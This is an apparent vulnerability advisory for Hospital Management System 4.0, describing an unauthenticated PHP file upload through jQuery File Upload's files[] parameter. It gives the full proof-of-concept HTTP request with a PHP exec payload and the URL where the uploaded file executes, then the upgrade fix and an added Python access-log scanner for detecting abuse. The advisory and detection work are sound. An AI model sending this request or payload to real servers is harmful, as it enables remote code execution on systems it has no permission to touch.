Affected Version: Hospital Management System 4.0
Security Issue:
Unauthenticated arbitrary file upload in jQuery File Upload through the files[] parameter of a POST request
URL: <http://localhost/Hospital-Management-System/vendor/jquery-file-upload/server/php/index.php>
Vulnerable Parameter: files[]
Method: POST
Payload:
<?php echo exec("ver");?>
--a211583f728c46a09ca726497e0a5a9f--
Vulnerability Description:
jQuery File Upload is a file upload widget with multiple file selection, drag&drop support, progress bars, validation and preview images, audio and video for jQuery.
A change in how the Apache web server handles its security settings exposed users of this plugin to an unrestricted file upload flaw.
HTTP Request:
POST /Hospital-Management-System/vendor/jquery-file-upload/server/php/index.php HTTP/1.1
Content-Type: multipart/form-data; boundary=a211583f728c46a09ca726497e0a5a9f
Cookie: PHPSESSID=
Content-Length: 177
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

--a211583f728c46a09ca726497e0a5a9f
Content-Disposition: form-data; name="files[]"; filename="osversion.php"

<?php echo exec("ver");?>
--a211583f728c46a09ca726497e0a5a9f--
HTTP Response:

Screenshot:
Visiting the URL will download the uploaded file, but its content is the result of the code execution.
URL of uploaded file: <http://localhost/Hospital-Management-System/vendor/jquery-file-upload/server/php/files/osversion.php>

The impact of this vulnerability:
An attacker could upload and execute malicious PHP code.
How to fix this vulnerability:
Upgrade to the latest version of jQuery File Upload. This vulnerability was fixed in jQuery File Upload v9.22.1.
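To check whether the endpoint was already used before upgrading, the following added example (not part of the original report) scans web server access logs for uploads to the handler and for script files served from its files/ directory. It assumes Apache Combined Log Format; the function name, the extension list and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Combined Log Format: host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
HANDLER = "/jquery-file-upload/server/php/index.php"
FILES_DIR = "/jquery-file-upload/server/php/files/"
# Assumed list of extensions a PHP-enabled server may execute; extend for your setup.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)$", re.I)

def find_upload_abuse(lines):
    """Return (kind, client, time, path) for handler uploads and script hits in files/."""
    findings, uploaders = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a Combined Log Format line
        host, when, method, target, status = m.groups()
        path = unquote(urlsplit(target).path)  # drop query string, decode %xx
        low = path.lower()
        if method == "POST" and low.endswith(HANDLER) and status.startswith("2"):
            uploaders.add(host)
            findings.append(("upload", host, when, path))
        elif FILES_DIR in low and SCRIPT_EXT.search(low) and status == "200":
            # A 200 on a script in the upload directory means the server ran it.
            kind = "exec-after-upload" if host in uploaders else "script-fetch"
            findings.append((kind, host, when, path))
    return findings

BASE = "/Hospital-Management-System/vendor/jquery-file-upload/server/php"
# Constructed sample log lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    f'203.0.113.7 - - [10/Feb/2023:10:01:02 +0000] "POST {BASE}/index.php HTTP/1.1" 200 412 "-" "-"',
    f'203.0.113.7 - - [10/Feb/2023:10:01:09 +0000] "GET {BASE}/files/osversion.php HTTP/1.1" 200 38 "-" "-"',
    f'198.51.100.20 - - [10/Feb/2023:10:05:00 +0000] "GET {BASE}/files/report.png HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.20 - - [10/Feb/2023:10:06:00 +0000] "GET /Hospital-Management-System/index.php HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(*finding, sep="\t")
```

Any file the scan reports under files/ should be pulled from the server and examined before it is deleted, since it records what was uploaded.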